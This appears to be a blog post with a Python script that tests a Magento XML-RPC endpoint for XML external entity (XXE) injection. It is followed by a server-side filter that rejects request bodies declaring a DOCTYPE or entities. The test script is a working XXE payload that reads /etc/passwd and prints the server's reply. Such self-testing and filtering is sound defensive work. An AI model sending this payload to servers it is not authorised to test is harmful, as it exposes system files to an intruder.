If you want to check whether your Magento installation is affected by the XXE injection in the XML-RPC API, I will show you my short Python script for it. You'll need Python with Requests, and the following script, which you may need to configure for your installation:

```python
import requests

# Adjust to your own installation
url = 'http://127.0.0.1/magento16/api/xmlrpc'
# File the external entity points at
filename = "/etc/passwd"

data = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "file://""" + filename + """">]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>"""

print(data)
# Passing a string as data sends it as the raw request body, not as form fields
r = requests.post(url, data=data)
print(r.text)
```
It doesn't look like much, but the hard part was finding out how to post data in a way that isn't an HTML form.
My own tests with this showed me that nearly no file is accessible from outside.
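A server-side counterpart to the check above, as an added example that is not part of the original post or of Magento: a pre-filter that refuses XML-RPC request bodies declaring a DOCTYPE or entities, which ordinary XML-RPC clients do not send. The function names and the benign sample request are assumptions made for illustration; the second sample is the body the script above posts.

```python
from xml.parsers import expat

def dtd_declarations(body):
    """Return the DOCTYPE/entity declarations found in an XML-RPC body.

    Raises expat.ExpatError if the body is not well-formed XML.
    No ExternalEntityRefHandler is installed, so a file:// target
    named in the body is never opened by this check.
    """
    found = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        found.append(("doctype", name, sysid))

    def on_entity(name, is_parameter, value, base, sysid, pubid, notation):
        # External entities carry a system identifier and no inline value
        kind = "external-entity" if sysid is not None else "internal-entity"
        found.append((kind, name, sysid))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(body, True)
    return found

def allow_request(body):
    """True only for well-formed bodies without any DTD or entity declaration."""
    try:
        return not dtd_declarations(body)
    except expat.ExpatError:
        return False

# Constructed sample: a plain XML-RPC call without a DOCTYPE
BENIGN = """<?xml version="1.0"?>
<methodCall><methodName>login</methodName><params/></methodCall>"""

# The request body sent by the check script in this post
PAGE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>"""

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("page payload", PAGE_PAYLOAD)):
        print(label, allow_request(body), dtd_declarations(body))
```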